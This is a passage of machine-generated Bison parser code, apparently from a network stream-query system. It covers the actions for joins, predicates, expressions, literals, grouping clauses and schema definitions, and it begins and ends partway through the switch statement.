{(yyval.var_pair) = new var_pair_t((yyvsp[-2].strval),(yyvsp[-1].strval));}
#line 1914 "fta.tab.cc" /* yacc.c:1646 */
break;
case 29:
#line 319 "fta.y" /* yacc.c:1646 */
{(yyval.var_pair) = new var_pair_t((yyvsp[-2].strval),(yyvsp[-1].strval));}
#line 1920 "fta.tab.cc" /* yacc.c:1646 */
break;
case 30:
#line 323 "fta.y" /* yacc.c:1646 */
{(yyval.tblp) = (yyvsp[0].tblp)->add_selection((yyvsp[-1].select_listval));}
#line 1926 "fta.tab.cc" /* yacc.c:1646 */
break;
case 31:
#line 328 "fta.y" /* yacc.c:1646 */
{(yyval.tblp) = new table_exp_t((yyvsp[-1].clist),(yyvsp[0].tbl_list));}
#line 1932 "fta.tab.cc" /* yacc.c:1646 */
break;
case 32:
#line 330 "fta.y" /* yacc.c:1646 */
{(yyval.tblp) = new table_exp_t((yyvsp[-3].clist),(yyvsp[-1].scalarval),(yyvsp[0].tbl_list));}
#line 1938 "fta.tab.cc" /* yacc.c:1646 */
break;
case 33:
#line 335 "fta.y" /* yacc.c:1646 */
{(yyval.tblp) = table_exp_t::make_watchlist_tbl((yyvsp[-1].field_list_t)); }
#line 1944 "fta.tab.cc" /* yacc.c:1646 */
break;
case 34:
#line 342 "fta.y" /* yacc.c:1646 */
{ (yyval.select_listval) = (yyvsp[0].select_listval);}
#line 1950 "fta.tab.cc" /* yacc.c:1646 */
break;
case 35:
#line 354 "fta.y" /* yacc.c:1646 */
{(yyval.tblp)=new table_exp_t((yyvsp[-7].tbl_list),(yyvsp[-6].predp),(yyvsp[-5].extended_gb_list),(yyvsp[-4].clist),(yyvsp[-3].predp),(yyvsp[-2].predp),(yyvsp[-1].predp), (yyvsp[0].predp));}
#line 1956 "fta.tab.cc" /* yacc.c:1646 */
break;
case 36:
#line 358 "fta.y" /* yacc.c:1646 */
{(yyval.tbl_list) = (yyvsp[0].tbl_list); (yyval.tbl_list)->set_properties(-1);}
#line 1962 "fta.tab.cc" /* yacc.c:1646 */
break;
case 37:
#line 359 "fta.y" /* yacc.c:1646 */
{(yyval.tbl_list) = (yyvsp[0].tbl_list); (yyval.tbl_list)->set_properties(INNER_JOIN_PROPERTY);}
#line 1968 "fta.tab.cc" /* yacc.c:1646 */
break;
case 38:
#line 360 "fta.y" /* yacc.c:1646 */
{(yyval.tbl_list) = (yyvsp[0].tbl_list); (yyval.tbl_list)->set_properties(OUTER_JOIN_PROPERTY);}
#line 1974 "fta.tab.cc" /* yacc.c:1646 */
break;
case 39:
#line 361 "fta.y" /* yacc.c:1646 */
{(yyval.tbl_list) = (yyvsp[0].tbl_list); (yyval.tbl_list)->set_properties(RIGHT_OUTER_JOIN_PROPERTY);}
#line 1980 "fta.tab.cc" /* yacc.c:1646 */
break;
case 40:
#line 362 "fta.y" /* yacc.c:1646 */
{(yyval.tbl_list) = (yyvsp[0].tbl_list); (yyval.tbl_list)->set_properties(LEFT_OUTER_JOIN_PROPERTY);}
#line 1986 "fta.tab.cc" /* yacc.c:1646 */
break;
case 41:
#line 363 "fta.y" /* yacc.c:1646 */
{(yyval.tbl_list) = (yyvsp[0].tbl_list); (yyval.tbl_list)->set_properties(WATCHLIST_JOIN_PROPERTY);}
#line 1992 "fta.tab.cc" /* yacc.c:1646 */
break;
case 42:
#line 364 "fta.y" /* yacc.c:1646 */
{(yyval.tbl_list) = (yyvsp[0].tbl_list); (yyval.tbl_list)->set_properties(FILTER_JOIN_PROPERTY); (yyval.tbl_list)->set_colref((yyvsp[-5].colref)); (yyval.tbl_list)->set_temporal_range((yyvsp[-3].strval));}
#line 1998 "fta.tab.cc" /* yacc.c:1646 */
break;
case 43:
#line 368 "fta.y" /* yacc.c:1646 */
{(yyval.tbl_list) = new tablevar_list_t((yyvsp[0].table));}
#line 2004 "fta.tab.cc" /* yacc.c:1646 */
break;
case 44:
#line 369 "fta.y" /* yacc.c:1646 */
{(yyval.tbl_list)= (yyvsp[-2].tbl_list)->append_table((yyvsp[0].table));}
#line 2010 "fta.tab.cc" /* yacc.c:1646 */
break;
case 45:
#line 373 "fta.y" /* yacc.c:1646 */
{ (yyval.table) = (yyvsp[0].table);}
#line 2016 "fta.tab.cc" /* yacc.c:1646 */
break;
case 46:
#line 374 "fta.y" /* yacc.c:1646 */
{ (yyval.table)= (yyvsp[-1].table)->set_range_var((yyvsp[0].strval));}
#line 2022 "fta.tab.cc" /* yacc.c:1646 */
break;
case 47:
#line 378 "fta.y" /* yacc.c:1646 */
{(yyval.table) = new tablevar_t((yyvsp[0].stringval)->c_str());}
#line 2028 "fta.tab.cc" /* yacc.c:1646 */
break;
case 48:
#line 379 "fta.y" /* yacc.c:1646 */
{(yyval.table) = new tablevar_t((yyvsp[-2].strval),(yyvsp[0].stringval)->c_str(),0);}
#line 2034 "fta.tab.cc" /* yacc.c:1646 */
break;
case 49:
#line 380 "fta.y" /* yacc.c:1646 */
{(yyval.table) = new tablevar_t((yyvsp[-4].strval),(yyvsp[-2].strval),(yyvsp[0].stringval)->c_str());}
#line 2040 "fta.tab.cc" /* yacc.c:1646 */
break;
case 50:
#line 381 "fta.y" /* yacc.c:1646 */
{(yyval.table) = new tablevar_t((yyvsp[-4].strval),(yyvsp[-2].strval),(yyvsp[0].stringval)->c_str());}
#line 2046 "fta.tab.cc" /* yacc.c:1646 */
break;
case 51:
#line 382 "fta.y" /* yacc.c:1646 */
{(yyval.table) = new tablevar_t((yyvsp[-3].strval),(yyvsp[0].stringval)->c_str(),1);}
#line 2052 "fta.tab.cc" /* yacc.c:1646 */
break;
case 52:
#line 386 "fta.y" /* yacc.c:1646 */
{(yyval.stringval) = new string_t((yyvsp[0].strval));}
#line 2058 "fta.tab.cc" /* yacc.c:1646 */
break;
case 53:
#line 387 "fta.y" /* yacc.c:1646 */
{(yyval.stringval) = (yyval.stringval)->append("/",(yyvsp[0].strval));}
#line 2064 "fta.tab.cc" /* yacc.c:1646 */
break;
case 54:
#line 392 "fta.y" /* yacc.c:1646 */
{(yyval.predp)=NULL;}
#line 2070 "fta.tab.cc" /* yacc.c:1646 */
break;
case 55:
#line 393 "fta.y" /* yacc.c:1646 */
{(yyval.predp)=(yyvsp[0].predp);}
#line 2076 "fta.tab.cc" /* yacc.c:1646 */
break;
case 56:
#line 397 "fta.y" /* yacc.c:1646 */
{(yyval.predp) = (yyvsp[0].predp);}
#line 2082 "fta.tab.cc" /* yacc.c:1646 */
break;
case 57:
#line 401 "fta.y" /* yacc.c:1646 */
{(yyval.predp)=NULL;}
#line 2088 "fta.tab.cc" /* yacc.c:1646 */
break;
case 58:
#line 402 "fta.y" /* yacc.c:1646 */
{(yyval.predp)=(yyvsp[0].predp); }
#line 2094 "fta.tab.cc" /* yacc.c:1646 */
break;
case 59:
#line 406 "fta.y" /* yacc.c:1646 */
{(yyval.predp)=NULL;}
#line 2100 "fta.tab.cc" /* yacc.c:1646 */
break;
case 60:
#line 407 "fta.y" /* yacc.c:1646 */
{(yyval.predp)=(yyvsp[0].predp); }
#line 2106 "fta.tab.cc" /* yacc.c:1646 */
break;
case 61:
#line 411 "fta.y" /* yacc.c:1646 */
{(yyval.predp)=NULL;}
#line 2112 "fta.tab.cc" /* yacc.c:1646 */
break;
case 62:
#line 412 "fta.y" /* yacc.c:1646 */
{(yyval.predp)=(yyvsp[0].predp); }
#line 2118 "fta.tab.cc" /* yacc.c:1646 */
break;
case 63:
#line 416 "fta.y" /* yacc.c:1646 */
{(yyval.predp)=NULL;}
#line 2124 "fta.tab.cc" /* yacc.c:1646 */
break;
case 64:
#line 417 "fta.y" /* yacc.c:1646 */
{(yyval.predp)=(yyvsp[0].predp);}
#line 2130 "fta.tab.cc" /* yacc.c:1646 */
break;
case 65:
#line 421 "fta.y" /* yacc.c:1646 */
{(yyval.predp) = (yyvsp[0].predp);}
#line 2136 "fta.tab.cc" /* yacc.c:1646 */
break;
case 66:
#line 428 "fta.y" /* yacc.c:1646 */
{(yyval.predp)=new predicate_t("OR",(yyvsp[-2].predp),(yyvsp[0].predp));}
#line 2142 "fta.tab.cc" /* yacc.c:1646 */
break;
case 67:
#line 429 "fta.y" /* yacc.c:1646 */
{(yyval.predp)=new predicate_t("AND",(yyvsp[-2].predp),(yyvsp[0].predp));}
#line 2148 "fta.tab.cc" /* yacc.c:1646 */
break;
case 68:
#line 430 "fta.y" /* yacc.c:1646 */
{(yyval.predp) = new predicate_t("NOT", (yyvsp[0].predp) );}
#line 2154 "fta.tab.cc" /* yacc.c:1646 */
break;
case 69:
#line 431 "fta.y" /* yacc.c:1646 */
{(yyval.predp) = (yyvsp[-1].predp);}
#line 2160 "fta.tab.cc" /* yacc.c:1646 */
break;
case 70:
#line 432 "fta.y" /* yacc.c:1646 */
{(yyval.predp) = (yyvsp[0].predp);}
#line 2166 "fta.tab.cc" /* yacc.c:1646 */
break;
case 71:
#line 436 "fta.y" /* yacc.c:1646 */
{ (yyval.predp)=(yyvsp[0].predp);}
#line 2172 "fta.tab.cc" /* yacc.c:1646 */
break;
case 72:
#line 437 "fta.y" /* yacc.c:1646 */
{ (yyval.predp) = (yyvsp[0].predp);}
#line 2178 "fta.tab.cc" /* yacc.c:1646 */
break;
case 73:
#line 438 "fta.y" /* yacc.c:1646 */
{(yyval.predp) = predicate_t::make_paramless_fcn_predicate((yyvsp[-2].strval)); }
#line 2184 "fta.tab.cc" /* yacc.c:1646 */
break;
case 74:
#line 439 "fta.y" /* yacc.c:1646 */
{(yyval.predp) = new predicate_t((yyvsp[-3].strval), (yyvsp[-1].se_listval)->get_se_list()); }
#line 2190 "fta.tab.cc" /* yacc.c:1646 */
break;
case 75:
#line 443 "fta.y" /* yacc.c:1646 */
{(yyval.predp) = new predicate_t((yyvsp[-2].scalarval),(yyvsp[-1].strval),(yyvsp[0].scalarval));}
#line 2196 "fta.tab.cc" /* yacc.c:1646 */
break;
case 76:
#line 447 "fta.y" /* yacc.c:1646 */
{ (yyval.predp) = new predicate_t((yyvsp[-4].scalarval),(yyvsp[-1].lit_l)); }
#line 2202 "fta.tab.cc" /* yacc.c:1646 */
break;
case 77:
#line 451 "fta.y" /* yacc.c:1646 */
{(yyval.lit_l) = new literal_list_t((yyvsp[0].litval));}
#line 2208 "fta.tab.cc" /* yacc.c:1646 */
break;
case 78:
#line 452 "fta.y" /* yacc.c:1646 */
{(yyval.lit_l) = (yyvsp[-2].lit_l)->append_literal((yyvsp[0].litval));}
#line 2214 "fta.tab.cc" /* yacc.c:1646 */
break;
case 79:
#line 458 "fta.y" /* yacc.c:1646 */
{ (yyval.scalarval)=new scalarexp_t("+",(yyvsp[-2].scalarval),(yyvsp[0].scalarval));}
#line 2220 "fta.tab.cc" /* yacc.c:1646 */
break;
case 80:
#line 459 "fta.y" /* yacc.c:1646 */
{ (yyval.scalarval)=new scalarexp_t("-",(yyvsp[-2].scalarval),(yyvsp[0].scalarval));}
#line 2226 "fta.tab.cc" /* yacc.c:1646 */
break;
case 81:
#line 460 "fta.y" /* yacc.c:1646 */
{ (yyval.scalarval)=new scalarexp_t("|",(yyvsp[-2].scalarval),(yyvsp[0].scalarval));}
#line 2232 "fta.tab.cc" /* yacc.c:1646 */
break;
case 82:
#line 461 "fta.y" /* yacc.c:1646 */
{ (yyval.scalarval)=new scalarexp_t("*",(yyvsp[-2].scalarval),(yyvsp[0].scalarval));}
#line 2238 "fta.tab.cc" /* yacc.c:1646 */
break;
case 83:
#line 462 "fta.y" /* yacc.c:1646 */
{ (yyval.scalarval)=new scalarexp_t("/",(yyvsp[-2].scalarval),(yyvsp[0].scalarval));}
#line 2244 "fta.tab.cc" /* yacc.c:1646 */
break;
case 84:
#line 463 "fta.y" /* yacc.c:1646 */
{ (yyval.scalarval)=new scalarexp_t("&",(yyvsp[-2].scalarval),(yyvsp[0].scalarval));}
#line 2250 "fta.tab.cc" /* yacc.c:1646 */
break;
case 85:
#line 464 "fta.y" /* yacc.c:1646 */
{ (yyval.scalarval)=new scalarexp_t("%",(yyvsp[-2].scalarval),(yyvsp[0].scalarval));}
#line 2256 "fta.tab.cc" /* yacc.c:1646 */
break;
case 86:
#line 465 "fta.y" /* yacc.c:1646 */
{ (yyval.scalarval)=new scalarexp_t((yyvsp[-1].strval),(yyvsp[-2].scalarval),(yyvsp[0].scalarval));}
#line 2262 "fta.tab.cc" /* yacc.c:1646 */
break;
case 87:
#line 466 "fta.y" /* yacc.c:1646 */
{ (yyval.scalarval) = new scalarexp_t("+",(yyvsp[0].scalarval));}
#line 2268 "fta.tab.cc" /* yacc.c:1646 */
break;
case 88:
#line 467 "fta.y" /* yacc.c:1646 */
{ (yyval.scalarval) = new scalarexp_t("-",(yyvsp[0].scalarval));}
#line 2274 "fta.tab.cc" /* yacc.c:1646 */
break;
case 89:
#line 468 "fta.y" /* yacc.c:1646 */
{ (yyval.scalarval) = new scalarexp_t("!",(yyvsp[0].scalarval));}
#line 2280 "fta.tab.cc" /* yacc.c:1646 */
break;
case 90:
#line 469 "fta.y" /* yacc.c:1646 */
{ (yyval.scalarval) = new scalarexp_t("~",(yyvsp[0].scalarval));}
#line 2286 "fta.tab.cc" /* yacc.c:1646 */
break;
case 91:
#line 470 "fta.y" /* yacc.c:1646 */
{ (yyval.scalarval)= new scalarexp_t((yyvsp[0].litval));}
#line 2292 "fta.tab.cc" /* yacc.c:1646 */
break;
case 92:
#line 471 "fta.y" /* yacc.c:1646 */
{(yyval.scalarval) = scalarexp_t::make_param_reference((yyvsp[0].strval));}
#line 2298 "fta.tab.cc" /* yacc.c:1646 */
break;
case 93:
#line 472 "fta.y" /* yacc.c:1646 */
{(yyval.scalarval) = scalarexp_t::make_iface_param_reference((yyvsp[0].ifpref));}
#line 2304 "fta.tab.cc" /* yacc.c:1646 */
break;
case 94:
#line 473 "fta.y" /* yacc.c:1646 */
{ (yyval.scalarval) = new scalarexp_t((yyvsp[0].colref));}
#line 2310 "fta.tab.cc" /* yacc.c:1646 */
break;
case 95:
#line 474 "fta.y" /* yacc.c:1646 */
{(yyval.scalarval) = (yyvsp[-1].scalarval);}
#line 2316 "fta.tab.cc" /* yacc.c:1646 */
break;
case 96:
#line 475 "fta.y" /* yacc.c:1646 */
{ (yyval.scalarval) = scalarexp_t::make_star_aggr((yyvsp[-3].strval)); }
#line 2322 "fta.tab.cc" /* yacc.c:1646 */
break;
case 97:
#line 476 "fta.y" /* yacc.c:1646 */
{ (yyval.scalarval) = scalarexp_t::make_se_aggr((yyvsp[-3].strval),(yyvsp[-1].scalarval)); }
#line 2328 "fta.tab.cc" /* yacc.c:1646 */
break;
case 98:
#line 477 "fta.y" /* yacc.c:1646 */
{(yyval.scalarval) = new scalarexp_t((yyvsp[-3].strval), (yyvsp[-1].se_listval)->get_se_list()); }
#line 2334 "fta.tab.cc" /* yacc.c:1646 */
break;
case 99:
#line 478 "fta.y" /* yacc.c:1646 */
{(yyval.scalarval) = scalarexp_t::make_paramless_fcn((yyvsp[-2].strval)); }
#line 2340 "fta.tab.cc" /* yacc.c:1646 */
break;
case 100:
#line 479 "fta.y" /* yacc.c:1646 */
{ (yyval.scalarval) = scalarexp_t::make_star_aggr((yyvsp[-4].strval)); (yyval.scalarval)->set_superaggr(true); }
#line 2346 "fta.tab.cc" /* yacc.c:1646 */
break;
case 101:
#line 480 "fta.y" /* yacc.c:1646 */
{ (yyval.scalarval) = scalarexp_t::make_se_aggr((yyvsp[-4].strval),(yyvsp[-1].scalarval)); (yyval.scalarval)->set_superaggr(true); }
#line 2352 "fta.tab.cc" /* yacc.c:1646 */
break;
case 102:
#line 481 "fta.y" /* yacc.c:1646 */
{(yyval.scalarval) = new scalarexp_t((yyvsp[-4].strval), (yyvsp[-1].se_listval)->get_se_list()); (yyval.scalarval)->set_superaggr(true); }
#line 2358 "fta.tab.cc" /* yacc.c:1646 */
break;
case 103:
#line 482 "fta.y" /* yacc.c:1646 */
{(yyval.scalarval) = scalarexp_t::make_paramless_fcn((yyvsp[-3].strval)); (yyval.scalarval)->set_superaggr(true); }
#line 2364 "fta.tab.cc" /* yacc.c:1646 */
break;
case 104:
#line 487 "fta.y" /* yacc.c:1646 */
{ (yyval.select_listval)= new select_list_t((yyvsp[0].scalarval)); }
#line 2370 "fta.tab.cc" /* yacc.c:1646 */
break;
case 105:
#line 488 "fta.y" /* yacc.c:1646 */
{ (yyval.select_listval)= new select_list_t((yyvsp[-2].scalarval),(yyvsp[0].strval)); }
#line 2376 "fta.tab.cc" /* yacc.c:1646 */
break;
case 106:
#line 489 "fta.y" /* yacc.c:1646 */
{ (yyval.select_listval)=(yyvsp[-2].select_listval)->append((yyvsp[0].scalarval)); }
#line 2382 "fta.tab.cc" /* yacc.c:1646 */
break;
case 107:
#line 490 "fta.y" /* yacc.c:1646 */
{ (yyval.select_listval)=(yyvsp[-4].select_listval)->append((yyvsp[-2].scalarval),(yyvsp[0].strval)); }
#line 2388 "fta.tab.cc" /* yacc.c:1646 */
break;
case 108:
#line 494 "fta.y" /* yacc.c:1646 */
{ (yyval.se_listval)= new se_list_t((yyvsp[0].scalarval)); }
#line 2394 "fta.tab.cc" /* yacc.c:1646 */
break;
case 109:
#line 495 "fta.y" /* yacc.c:1646 */
{ (yyval.se_listval)=(yyvsp[-2].se_listval)->append((yyvsp[0].scalarval)); }
#line 2400 "fta.tab.cc" /* yacc.c:1646 */
break;
case 110:
#line 499 "fta.y" /* yacc.c:1646 */
{(yyval.litval) = new literal_t((yyvsp[0].strval),LITERAL_STRING);}
#line 2406 "fta.tab.cc" /* yacc.c:1646 */
break;
case 111:
#line 500 "fta.y" /* yacc.c:1646 */
{(yyval.litval) = new literal_t((yyvsp[0].strval),LITERAL_INT);}
#line 2412 "fta.tab.cc" /* yacc.c:1646 */
break;
case 112:
#line 501 "fta.y" /* yacc.c:1646 */
{(yyval.litval) = new literal_t((yyvsp[0].strval),LITERAL_LONGINT);}
#line 2418 "fta.tab.cc" /* yacc.c:1646 */
break;
case 113:
#line 502 "fta.y" /* yacc.c:1646 */
{(yyval.litval) = new literal_t((yyvsp[0].strval),LITERAL_FLOAT);}
#line 2424 "fta.tab.cc" /* yacc.c:1646 */
break;
case 114:
#line 503 "fta.y" /* yacc.c:1646 */
{(yyval.litval) = new literal_t("TRUE",LITERAL_BOOL);}
#line 2430 "fta.tab.cc" /* yacc.c:1646 */
break;
case 115:
#line 504 "fta.y" /* yacc.c:1646 */
{(yyval.litval) = new literal_t("FALSE",LITERAL_BOOL);}
#line 2436 "fta.tab.cc" /* yacc.c:1646 */
break;
case 116:
#line 505 "fta.y" /* yacc.c:1646 */
{(yyval.litval) = new literal_t((yyvsp[0].strval),LITERAL_TIMEVAL);}
#line 2442 "fta.tab.cc" /* yacc.c:1646 */
break;
case 117:
#line 506 "fta.y" /* yacc.c:1646 */
{(yyval.litval) = new literal_t((yyvsp[0].strval),LITERAL_HEX);}
#line 2448 "fta.tab.cc" /* yacc.c:1646 */
break;
case 118:
#line 507 "fta.y" /* yacc.c:1646 */
{(yyval.litval) = new literal_t((yyvsp[0].strval),LITERAL_LONGHEX);}
#line 2454 "fta.tab.cc" /* yacc.c:1646 */
break;
case 119:
#line 508 "fta.y" /* yacc.c:1646 */
{(yyval.litval) = new literal_t((yyvsp[0].strval),LITERAL_IP);}
#line 2460 "fta.tab.cc" /* yacc.c:1646 */
break;
case 120:
#line 509 "fta.y" /* yacc.c:1646 */
{(yyval.litval) = new literal_t((yyvsp[0].strval),LITERAL_IPV6);}
#line 2466 "fta.tab.cc" /* yacc.c:1646 */
break;
case 121:
#line 510 "fta.y" /* yacc.c:1646 */
{(yyval.litval) = literal_t::make_define_literal((yyvsp[0].strval),fta_parse_defines);}
#line 2472 "fta.tab.cc" /* yacc.c:1646 */
break;
case 122:
#line 516 "fta.y" /* yacc.c:1646 */
{(yyval.extended_gb_list) = NULL;}
#line 2478 "fta.tab.cc" /* yacc.c:1646 */
break;
case 123:
#line 517 "fta.y" /* yacc.c:1646 */
{(yyval.extended_gb_list) = (yyvsp[0].extended_gb_list);}
#line 2484 "fta.tab.cc" /* yacc.c:1646 */
break;
case 124:
#line 521 "fta.y" /* yacc.c:1646 */
{(yyval.clist) = NULL;}
#line 2490 "fta.tab.cc" /* yacc.c:1646 */
break;
case 125:
#line 522 "fta.y" /* yacc.c:1646 */
{(yyval.clist) = (yyvsp[0].clist);}
#line 2496 "fta.tab.cc" /* yacc.c:1646 */
break;
case 126:
#line 526 "fta.y" /* yacc.c:1646 */
{ (yyval.list_of_gb_list) = new list_of_gb_list_t((yyvsp[-1].gb_list));}
#line 2502 "fta.tab.cc" /* yacc.c:1646 */
break;
case 127:
#line 527 "fta.y" /* yacc.c:1646 */
{(yyval.list_of_gb_list) = (yyvsp[-4].list_of_gb_list)->append((yyvsp[-1].gb_list));}
#line 2508 "fta.tab.cc" /* yacc.c:1646 */
break;
case 128:
#line 531 "fta.y" /* yacc.c:1646 */
{(yyval.extended_gb) = extended_gb_t::create_from_gb((yyvsp[0].gb_val));}
#line 2514 "fta.tab.cc" /* yacc.c:1646 */
break;
case 129:
#line 532 "fta.y" /* yacc.c:1646 */
{(yyval.extended_gb) = extended_gb_t::extended_create_from_rollup((yyvsp[-1].gb_list));}
#line 2520 "fta.tab.cc" /* yacc.c:1646 */
break;
case 130:
#line 533 "fta.y" /* yacc.c:1646 */
{(yyval.extended_gb) = extended_gb_t::extended_create_from_cube((yyvsp[-1].gb_list));}
#line 2526 "fta.tab.cc" /* yacc.c:1646 */
break;
case 131:
#line 534 "fta.y" /* yacc.c:1646 */
{(yyval.extended_gb) = extended_gb_t::extended_create_from_gsets((yyvsp[-1].list_of_gb_list));}
#line 2532 "fta.tab.cc" /* yacc.c:1646 */
break;
case 132:
#line 538 "fta.y" /* yacc.c:1646 */
{ (yyval.extended_gb_list) = new extended_gb_list_t((yyvsp[0].extended_gb));}
#line 2538 "fta.tab.cc" /* yacc.c:1646 */
break;
case 133:
#line 539 "fta.y" /* yacc.c:1646 */
{ (yyval.extended_gb_list)=(yyvsp[-2].extended_gb_list)->append((yyvsp[0].extended_gb));}
#line 2544 "fta.tab.cc" /* yacc.c:1646 */
break;
case 134:
#line 543 "fta.y" /* yacc.c:1646 */
{ (yyval.gb_list) = new gb_list_t((yyvsp[0].gb_val));}
#line 2550 "fta.tab.cc" /* yacc.c:1646 */
break;
case 135:
#line 544 "fta.y" /* yacc.c:1646 */
{ (yyval.gb_list)=(yyvsp[-2].gb_list)->append((yyvsp[0].gb_val));}
#line 2556 "fta.tab.cc" /* yacc.c:1646 */
break;
case 136:
#line 548 "fta.y" /* yacc.c:1646 */
{(yyval.gb_val) = new gb_t((yyvsp[0].strval)); }
#line 2562 "fta.tab.cc" /* yacc.c:1646 */
break;
case 137:
#line 549 "fta.y" /* yacc.c:1646 */
{(yyval.gb_val) = new gb_t((yyvsp[-2].strval),(yyvsp[0].strval)); }
#line 2568 "fta.tab.cc" /* yacc.c:1646 */
break;
case 138:
#line 550 "fta.y" /* yacc.c:1646 */
{(yyval.gb_val) = new gb_t((yyvsp[-4].strval),(yyvsp[-2].strval),(yyvsp[0].strval)); }
#line 2574 "fta.tab.cc" /* yacc.c:1646 */
break;
case 139:
#line 551 "fta.y" /* yacc.c:1646 */
{(yyval.gb_val) = new gb_t((yyvsp[-2].scalarval),(yyvsp[0].strval)); }
#line 2580 "fta.tab.cc" /* yacc.c:1646 */
break;
case 140:
#line 562 "fta.y" /* yacc.c:1646 */
{(yyval.ifpref) = new ifpref_t((yyvsp[0].strval));}
#line 2586 "fta.tab.cc" /* yacc.c:1646 */
break;
case 141:
#line 563 "fta.y" /* yacc.c:1646 */
{(yyval.ifpref) = new ifpref_t((yyvsp[-3].strval), (yyvsp[0].strval));}
#line 2592 "fta.tab.cc" /* yacc.c:1646 */
break;
case 142:
#line 567 "fta.y" /* yacc.c:1646 */
{(yyval.colref) = new colref_t((yyvsp[0].strval)); }
#line 2598 "fta.tab.cc" /* yacc.c:1646 */
break;
case 143:
#line 568 "fta.y" /* yacc.c:1646 */
{(yyval.colref) = new colref_t((yyvsp[-2].strval),(yyvsp[0].strval)); }
#line 2604 "fta.tab.cc" /* yacc.c:1646 */
break;
case 144:
#line 569 "fta.y" /* yacc.c:1646 */
{(yyval.colref) = new colref_t((yyvsp[-4].strval),(yyvsp[-2].strval),(yyvsp[0].strval)); }
#line 2610 "fta.tab.cc" /* yacc.c:1646 */
break;
case 145:
#line 573 "fta.y" /* yacc.c:1646 */
{(yyval.clist)=new colref_list_t((yyvsp[-2].colref)); (yyval.clist)->append((yyvsp[0].colref));}
#line 2616 "fta.tab.cc" /* yacc.c:1646 */
break;
case 146:
#line 574 "fta.y" /* yacc.c:1646 */
{(yyval.clist) = (yyvsp[-2].clist)->append((yyvsp[0].colref));}
#line 2622 "fta.tab.cc" /* yacc.c:1646 */
break;
case 147:
#line 578 "fta.y" /* yacc.c:1646 */
{(yyval.colref) = new colref_t((yyvsp[0].strval)); }
#line 2628 "fta.tab.cc" /* yacc.c:1646 */
break;
case 148:
#line 582 "fta.y" /* yacc.c:1646 */
{(yyval.clist)=new colref_list_t((yyvsp[-2].colref)); (yyval.clist)->append((yyvsp[0].colref));}
#line 2634 "fta.tab.cc" /* yacc.c:1646 */
break;
case 149:
#line 583 "fta.y" /* yacc.c:1646 */
{(yyval.clist) = (yyvsp[-2].clist)->append((yyvsp[0].colref));}
#line 2640 "fta.tab.cc" /* yacc.c:1646 */
break;
case 150:
#line 598 "fta.y" /* yacc.c:1646 */
{(yyval.table_list_schema) = new table_list((yyvsp[0].table_def_t));}
#line 2646 "fta.tab.cc" /* yacc.c:1646 */
break;
case 151:
#line 599 "fta.y" /* yacc.c:1646 */
{(yyval.table_list_schema) = (yyvsp[-1].table_list_schema)->append_table((yyvsp[0].table_def_t));}
#line 2652 "fta.tab.cc" /* yacc.c:1646 */
break;
case 152:
#line 602 "fta.y" /* yacc.c:1646 */
{
(yyval.table_def_t)=new table_def((yyvsp[-5].strval),(yyvsp[-4].plist_t),(yyvsp[-3].plist_t), (yyvsp[-1].field_list_t), PROTOCOL_SCHEMA); delete (yyvsp[-4].plist_t); delete (yyvsp[-1].field_list_t);}
#line 2659 "fta.tab.cc" /* yacc.c:1646 */
break;
case 153:
#line 604 "fta.y" /* yacc.c:1646 */
{
(yyval.table_def_t)=new table_def((yyvsp[-4].stringval)->c_str(),(yyvsp[-3].plist_t),NULL,(yyvsp[-1].field_list_t), STREAM_SCHEMA); delete (yyvsp[-1].field_list_t);}
#line 2666 "fta.tab.cc" /* yacc.c:1646 */
break;
case 154:
#line 606 "fta.y" /* yacc.c:1646 */
{
(yyval.table_def_t) = new table_def((yyvsp[-14].strval), (yyvsp[-11].plist_t), (yyvsp[-8].field_list_t), (yyvsp[-4].subqueryspec_list_t), (yyvsp[-1].plist_t)); }
#line 2673 "fta.tab.cc" /* yacc.c:1646 */
break;
case 155:
#line 608 "fta.y" /* yacc.c:1646 */
{ (yyval.table_def_t) = new table_def((yyvsp[-1].ufcnl)); }
#line 2679 "fta.tab.cc" /* yacc.c:1646 */
break;
case 156:
#line 612 "fta.y" /* yacc.c:1646 */
{(yyval.ufcnl) = new unpack_fcn_list((yyvsp[0].ufcn));}
#line 2685 "fta.tab.cc" /* yacc.c:1646 */
break;
case 157:
#line 613 "fta.y" /* yacc.c:1646 */
{(yyval.ufcnl) = (yyvsp[-2].ufcnl) -> append((yyvsp[0].ufcn));}
#line 2691 "fta.tab.cc" /* yacc.c:1646 */
break;
case 158:
#line 617 "fta.y" /* yacc.c:1646 */
{(yyval.ufcn) = new unpack_fcn((yyvsp[-2].strval),(yyvsp[-1].strval),(yyvsp[0].strval));}
#line 2697 "fta.tab.cc" /* yacc.c:1646 */
break;
case 159:
#line 621 "fta.y" /* yacc.c:1646 */
{(yyval.subqueryspec_list_t) = new subqueryspec_list((yyvsp[0].subq_spec_t));}
#line 2703 "fta.tab.cc" /* yacc.c:1646 */
break;
case 160:
#line 622 "fta.y" /* yacc.c:1646 */
{(yyval.subqueryspec_list_t) = (yyvsp[-2].subqueryspec_list_t)->append((yyvsp[0].subq_spec_t));}
#line 2709 "fta.tab.cc" /* yacc.c:1646 */
break;
case 161:
#line 626 "fta.y" /* yacc.c:1646 */
{(yyval.subq_spec_t)=new subquery_spec((yyvsp[-3].strval), (yyvsp[-1].namevec_t)); delete (yyvsp[-1].namevec_t);}
#line 2715 "fta.tab.cc" /* yacc.c:1646 */
break;
case 162:
#line 629 "fta.y" /* yacc.c:1646 */
{(yyval.field_list_t) = new field_entry_list((yyvsp[0].field_t));}
#line 2721 "fta.tab.cc" /* yacc.c:1646 */
break;
case 163:
#line 630 "fta.y" /* yacc.c:1646 */
{(yyval.field_list_t) = (yyvsp[-1].field_list_t)->append_field((yyvsp[0].field_t));}
#line 2727 "fta.tab.cc" /* yacc.c:1646 */
break;
case 164:
#line 634 "fta.y" /* yacc.c:1646 */
{(yyval.field_t) = new field_entry((yyvsp[-5].strval),(yyvsp[-4].strval),(yyvsp[-3].strval),(yyvsp[-2].plist_t),(yyvsp[-1].plist_t));}
#line 2733 "fta.tab.cc" /* yacc.c:1646 */
break;
case 165:
#line 635 "fta.y" /* yacc.c:1646 */
{(yyval.field_t) = new field_entry((yyvsp[-3].strval),(yyvsp[-2].strval),"",(yyvsp[-1].plist_t),NULL);}
#line 2739 "fta.tab.cc" /* yacc.c:1646 */
break;
case 166:
#line 639 "fta.y" /* yacc.c:1646 */
{(yyval.plist_t) = NULL;}
#line 2745 "fta.tab.cc" /* yacc.c:1646 */
break;
case 167:
#line 640 "fta.y" /* yacc.c:1646 */
{(yyval.plist_t) = (yyvsp[-1].plist_t);}
#line 2751 "fta.tab.cc" /* yacc.c:1646 */
break;
case 168:
